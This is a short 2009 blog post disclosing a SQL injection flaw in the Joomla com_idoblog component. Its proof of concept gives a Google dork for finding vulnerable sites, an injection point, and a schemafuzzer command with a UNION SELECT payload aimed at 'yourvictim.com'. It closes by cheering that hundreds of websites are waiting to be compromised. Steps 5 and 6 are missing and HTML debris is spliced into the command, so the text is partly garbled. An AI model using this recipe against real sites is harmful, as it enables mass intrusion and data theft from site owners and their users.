12 August 2009

Joomla com_idoblog SQL Injection Vulnerability (ALL VERSIONS)


dear mr admin,
Do you know that at least 5-10 Joomla component vulnerabilities is reported everyday. Everyday.


If you are using com_idoblog for your Joomla,please change to alternative,more secure component.
I've tested this vulnerability and yes,it affects all version of Joomla.

POC
1.google dork inurl:com_idoblog itemid=
2.inject ' at userid and you may receive an error message..here we go
3.use schemafuzzer/sqlmap instead of manual sql test. Manual sql thru browser will show only 3 column=false instead of 16=true.
4.schema fuzzer result =
$ python skemafuzzer.py -u "http://yourvictim.com/index.php?option=com_idoblog&task=profile&userid=63+AND+1=2+UNION+SELECT+darkc0de,
darkc0de,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15" < style="font-style: italic;">inurl:login.php or admin.php site:yourvictim.com

7.BOOOM!hundreds of websites waiting to be compromised

No comments: